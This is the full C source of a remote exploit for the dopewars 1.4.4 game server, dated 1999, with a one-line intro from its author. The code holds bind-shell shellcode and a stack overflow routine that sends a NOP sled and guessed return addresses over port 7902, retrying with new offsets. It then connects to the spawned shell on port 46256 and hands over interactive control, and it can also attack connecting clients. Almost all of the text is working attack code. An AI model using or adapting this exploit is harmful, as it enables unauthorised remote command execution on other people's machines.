dopewars 1.4.4 exploit, it's been fixed now ( thanks to my patch :-) ). It dates back to oktober 1999. But i used some cool methods in it.
f7b77db072d1405a450204a66ded9b44f5d8fe5c91b142d9376c984870b4f68f
/* PRIVATE Do NOT Distribute PRIVATE */
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
/*
* Dopewars by Ben Webb (Version 1.4.4 maybe older ones too).
* This exploit will cause a shell to be created on port 46256.
* The bug in located inside the ProcessMessage() and ExtractWordDelim()
* functions.
*
* I already send a patch to the Ben Webb and he'll add it in the next release.
*
* Date: oktober 1999
* Lamagra <access-granted@geocities.com>
*/
char hellshell[]=
"\x55\x89\xe5\xb2\x66\x89\xd0\x31\xc9"
"\x89\xcb\x43\x89\x5d\xf8\x43\x89\x5d\xf4\x4b\x89"
"\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89\x45\xf4"
"\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\xb4\xb0\x89"
"\x4d\xf0\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10"
"\x89\xd0\x8d\x4d\xf4\xcd\x80\x89\xd0\x43\x43\xcd"
"\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9\xb2\x3f"
"\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41"
"\xcd\x80\xc7\x45\xe8\x2f\x62\x69\x6e\x66\xc7\x45"
"\xec\x2f\x73\xc6\x45\xee\x68\x31\xc9\x88\x4d\xef"
"\xb0\x0b\x8d\x5d\xe8\x89\x5d\xe0\x8d\x4d\xe0\x31"
"\xd2\x89\x55\xe4\xcd\x80";
char jmpcode[]="\xeb\x0d";
int shell(unsigned long);
void transfer(char *, int);
void do_expl(int,int,long);
unsigned long resolve(char *);
main(int argc, char **argv)
{
int time,offset=0,client,fd;
struct sockaddr_in addr, clientaddr;
long eip = 0xbffff620;
if(argc < 2)
{
printf("Usage: %s {[-b] [offset]} {[hostname] [offset]}\n",argv[0]);
exit(-1);
}
if(argc > 2)
{
if(!strncmp(argv[2],"0x",2)) eip = strtoul(argv[2],0,0);
else offset = atoi(argv[2]);
}
fd = socket(AF_INET,SOCK_STREAM,0);
addr.sin_family = AF_INET;
addr.sin_port = htons(7902);
if(strcmp(argv[1],"-b"))
{
addr.sin_addr.s_addr = resolve(argv[1]);
for(time = 0;time < 20;time++)
{
/* Connect to server */
while(connect(fd,(struct sockaddr *)&addr,sizeof(struct sockaddr)) == -1)
{
perror("can't connect to server");
memset(addr.sin_zero,NULL,sizeof(addr.sin_zero));
sleep(20);
}
do_expl(fd,offset,eip);
sleep(1);
shell(addr.sin_addr.s_addr);
offset += 100; /* increase offset and try again */
}
}
else{
/* bind to 7902 and wait for a client */
addr.sin_addr.s_addr = INADDR_ANY;
if(bind(fd,(struct sockaddr *)&addr,16) == -1)
{
perror("bind");
exit(-1);
}
listen(fd,5);
bzero((char*)&clientaddr,sizeof(struct sockaddr_in));
client = accept(fd,&clientaddr,16);
do_expl(client,offset,eip);
sleep(1);
shell(clientaddr.sin_addr.s_addr);
}
close(fd);
}
void do_expl(int fd,int offset, long addy)
{
char buf[1024],*sploit;
char nops[213];
int x;
long *addr_ptr;
/* check eip for 0x0 */
if(!(addy+offset & 0xff) || !(addy+offset & 0xff00) || !(addy+offset & 0xff0000) || !(addy+offset & 0xff000000))
{
printf("NULL detected in address\n");
offset += 1;
}
sploit = nops;
for(x = 0;x < 200 - strlen(jmpcode);x++)
*(sploit++) = 0x90;
for(x = 0;x < strlen(jmpcode);x++)
*(sploit++) = jmpcode[x];
printf("Using address: 0x%x\n",addy+offset);
addr_ptr = (long *)(sploit++);
for(x = 0; x < 12;x+=4)
*(addr_ptr++) = addy + offset;
sprintf(buf,"%s^%s^%s\n",nops,nops, hellshell);
write(fd,buf,strlen(buf));
}
int shell(unsigned long addy)
{
char buf[1024];
fd_set set;
int len,sockfd;
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(46256);
addr.sin_addr.s_addr = addy;
sockfd = socket(AF_INET,SOCK_STREAM,0);
if(connect(sockfd,(struct sockaddr *)&addr,sizeof(struct sockaddr)) == -1)
{
perror("Sploit failed, connect");
close(sockfd);
return -1;
}
strcpy(buf,"cd /;id;echo \"hehe success, don't do anything nasty\"\n");
write(sockfd,buf,strlen(buf));
while(1)
{
FD_SET(fileno(stdin),&set);
FD_SET(sockfd,&set);
select(sockfd+1,&set,NULL,NULL,NULL);
if(FD_ISSET(fileno(stdin),&set))
{
memset(buf,NULL,1024);
fgets(buf,1024,stdin);
write(sockfd,buf,strlen(buf));
}
if(FD_ISSET(sockfd,&set))
{
memset(buf,NULL,1024);
if((len = read(sockfd,buf,1024)) == 0)
{
printf("EOF.\n");
close(sockfd);
exit(-1);
}
if(len == -1)
{
perror("read");
exit(-1);
}
puts(buf);
}
}
}
unsigned long resolve(char *name)
{
struct hostent *hp;
unsigned long ip;
if((ip = inet_addr(name)) == -1)
{
if((hp = gethostbyname(name)) == NULL)
{
printf("Unable to resolve <%s>\n",name);
exit(-1);
}
memcpy(&ip,hp->h_addr,4);
}
return ip;
}